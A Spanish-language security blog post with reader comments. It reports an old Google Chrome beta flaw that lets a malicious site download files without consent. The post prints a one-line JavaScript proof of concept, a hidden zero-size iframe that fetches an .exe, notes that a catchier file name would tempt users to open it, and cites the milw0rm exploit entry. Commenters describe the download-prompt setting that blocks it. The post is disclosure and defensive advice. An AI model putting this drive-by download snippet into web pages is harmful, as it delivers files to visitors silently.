Muy Bonito, Muy de la Casa, MUY INSEGURO

El Nuevo Navegador de Google puede ser muy rápido, muy bonito, consumir poca memoria, tener muchas funciones “WoW” pero en estos 2 días ha demostrado que es muy inseguro hoy me entero gracias a un comentario de exactlimon sobre un nuevo fallo en Google Chrome que permite descargar archivos (de cualquier tipo) sin el consentimiento del usuario.

Este fallo descubierto nerex y publicado en milw0rm.com consiste simplemente en escribir el siguiente código JavaScript en un sitio malicioso y automáticamente al visitar este sitio se descargara la aplicación mencionada.

<script>
document.write('<iframe src="http://www.dragonjar.org/calc.exe" frameborder="0" width="0" height="0">');
</script>

He subido una prueba de concepto al servidor con la calculadora de windows y  haciendo click aquí obtendrás algo parecido a esto.

Google Chrome

El archivo no se ejecuta, pero estoy seguro que con otro nombre e icono mas llamativos muchos lo abrirían solo por “curiosidad”, al parecer Google se ha dado cuenta de la cantidad de errores que tiene su navegador y ha dejado de promocionarlo en su pagina principal actualizado, han vuelto a promocionarlo en la pagina principal de google.

Google Chrome Inseguro

La version afectada con este y los otros fallos de seguridad mencionados anteriormente en el portal es la 0.2.149.27 les recomiendo que no utilicen este navegador al menos hasta que salga una nueva versión con estos problemas solucionados.

Mas Información:
http://milw0rm.com/exploits/6355
Primera Vulnerabilidad en Google Chrome
Nueva Vulnerabilidad en Google Chrome


Si te ha gustado el post, compartelo y ayudanos a crecer.

Unete a nuestra Fanpage Siguenos en Twitter

Autor: DragoN

Ingeniero en Sistemas y Telecomunicaciones de la Universidad de Manizales. Information Security Researcher con más de 10 años de experiencias en Ethical Hacking, Pen Testing y Análisis Forense. Docente Universitario en Pre y Post-Grado, Speaker y Organizador de diferentes eventos de Seguridad Informática, Fundador del DragonJAR Security Conference y Fundador de DragonJAR SAS y de La Comunidad DragonJAR, una de las comunidades de seguridad informática mas grandes de habla hispana y referente en el sector.

Compartir este Artículo
  • sisas parse, yo ya no lo vuelvo a usar, o si lo uso solo lo hago con paginas que yo conozco,
    y eso que con la duda…

    ya que usted dice que un .exe , pero si es en forma de autorun??

  • jaja yo ya lo comprobado lo descarge el primer día que salio, pero no me gusta tanto, algo le falta para que me llame la atencion pero no se. y gracias por abisar que es inseguro

  • silencioso

    se puede evitar esto desde las opciones en la pestaña especificas seleccionando “pedir ubicación antes de la descarga” pregunta si se quiere guardar el archivo o no y permite evitar este problema

  • Oskar

    No olvidaros que tan solo es una beta… no es una versión final…

  • No se tanto si es una falla de seguridad. Recordemos ke incluso firefox viene con la opción para descargar directamente un archivo al hacer click en el link.
    Para deshabilitar esta opción en Google Chrome la en: Opciones >> Especificas >> Pedir ubicación antes de la descarga. Y listo, incluso con ese script nos pide confirmación.
    (Que en verdad lo unico que hace ese javascript es crear un iframe que llama al archivo, no es nada magico, es como entrar nosotros mismos a ese archivo)

  • ElectroN

    Bueno, Al parecer o quitaron la publicidad de su pagian principal por valla yo a saber que.
    Tal vez alguna actualizacion de servidor de descarga o tal vez ya estan parcheados los primeros fallos de seguridad. bueno en fin ya esta de nuevo la publicidad en su pagina principal,
    No crean que se van a rendir tan facil, que a el primer incoveniente ya lo quitan y nada mas!!

  • No creo que por estos fallos que presenta un producto “beta” hay que crucificar a Google, es un primer intento y creo que han avanzado mucho en esto, y aparte no considero que la finalidad de Google sea solo mantener el mismo como un simple navegador mas, creo que la propuesta es algo mas de esto, por como Google viene manejandose, cual seria el interes por solo mostrar un navegador simple y sencillamente, o se olvidan que Google le aporta financieramente a Firefox, considero que hay que esperar un tiempo mas a ver que se trae Google con este navegador.

  • @NewDanger el problema es que no se le da click en ningún vinculo, el descarga la aplicación sin preguntar… (y asi viene por defecto)

    en cuanto a justificarse por que es “Beta”… pues no me parece… todos los productos de Google son “Betas”, las “Betas” en este mundo 2.0 significa que el software esta en constante cambio, no que sea un producto de pruebas.

    Google News… lleva mas de 4 años en beta..
    GMail… varios años en beta

    Todo lo de google es beta y no se justifica un fallo de esta magnitud, sumado a los muchos otros que han detectado http://groups.google.com/group/chromium-bugs/

  • Matìas

    Bueno recien anoche me descargue el chrome, como diseñador gráfico me parece excelente, siempre pensé en diseñar un navegador con mìnimos botones. Un defecto que encuentro en el diseño es que cuando uno posa el cursor para ver adónde se dirigirá el navegador al clickearlo no muestra la direcciòn completa como si sucede en IE. El resto me parece bien aunque yo agregaria un reloj al descargar las pàginas porque cuando las carga, si bien lo hace rápido el poco tiempo que tarda no aclara nada y parece que se cuelga… ademas, que en cada enlace en el que entremos abra una nueva ventana puede llegar a ser engorroso dependiendo de qué modo acostumbremos a navegar. Por lo demàs, acabo de bloquear las descargas automáticas las cookies y todo! x las dudas 😛

  • Pattty

    Lo descargué pero hasta la fecha no lo he instalado ni probado, y siendo asi, tampoco creo que lo haga 😀

  • julio

    si Dragon dice que es malo , es malo =) ,jeje la verdad me gusta el g chrome, pero tocara esperar a que lo “fixeen” =) , saludos a todos desde Cucuta.

  • cacom2

    jajajaja lo volviereon a kitar de la pagina de google, ke malesa!!!

  • ¿Y por qué en vez de no usarlo no se pone que pregunte en dónde guardar antes de descargar?

  • 0m3g4

    Pues de hecho el navegador no me pareció malo, pero tampoco es la gran cosa, además tiene otro detalle y es que en ocasiones cancela ingreso al correo, es decir, te logeas, pero te deja en espera, se queda cargando y puedes darle todos los F5 que quieras que igual no pasará nada hasta que resetees la PC.

    Y ahora viendo esto, definitivamente, no, fuera de servicio.

  • zfr

    Nunca me gusto ese navegador, nunca me dio confianza. Cuando lo use se colgaba con frecuencia y no es tan rapido como dicen. El diseño es excesivamente minimalista y se le hechan en faltan algunas opciones adicionales sobre todo en lo referente a la seguridad.
    De los 5 navegadores principales: ie, firefox, opera, safari, chrome es el mas inseguro y el que menos opciones tiene. Prefiero 1000 veces a opera.

  • sergi

    a mi si me gusta y es el navegador que mas uso , el internet exploter es inestable lento pero seguro, el firefox morcilla es muy bueno pero vengo notando que el arranque le esta tomano bastante tiempo.

Siguenos!

O Puedes Subscribete

ANTES DE

SALIRTE ...

NO TE

ARREPENTIRÁS

!Gracias¡

NO OLVIDES NUESTRAS REDES SOCIALES